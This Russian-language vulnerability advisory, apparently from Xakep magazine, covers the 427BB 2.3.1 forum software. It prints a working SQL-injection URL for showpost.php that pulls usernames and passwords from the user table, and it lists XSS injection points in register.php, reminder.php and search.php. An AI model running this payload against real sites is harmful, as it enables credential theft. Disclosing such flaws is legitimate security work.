Хакер #305. Многошаговые SQL-инъекции
Программа: 427BB 2.3.1
Найденные уязвимости позволяют удаленному злоумышленнику осуществить XSS
атаку и выполнить произвольные SQL команды в базе данных приложения.
1) Уязвимость возникает из-за ошибки в проверке входных данных сценарием
showpost.php. Удаленный пользователь может с помощью специально сформированного
запроса выполнить произвольные SQL команды в базе данных приложения.
Эксплоит:
http://[target]/[path]/showpost.php?ForumID=1&post=1 union select
1,UserName,3,4,5,Password,7 FROM 427bb_personal WHERE ID=1--
2) Уязвимость возникает из-за ошибки в проверке входных данных сценариями
register.php, reminder.php и search.php. Атакующий может выполнить произвольный
сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Эксплоит:
XSS в URI:
http://[target]/[path]/register.php/<XSS>
http://[target]/[path]/reminder.php/<XSS>
http://[target]/[path]/search.php/<XSS>
XSS с использованием POST метода:
http://[target]/[path]/register.php
[-]POST переменная "uname"
[-]POST переменная "email"
[-]POST переменная "email2"
http://[target]/[path]/reminder.php
[-]POST переменная "email"
http://[target]/[path]/search.php
[-]POST переменная "keywords"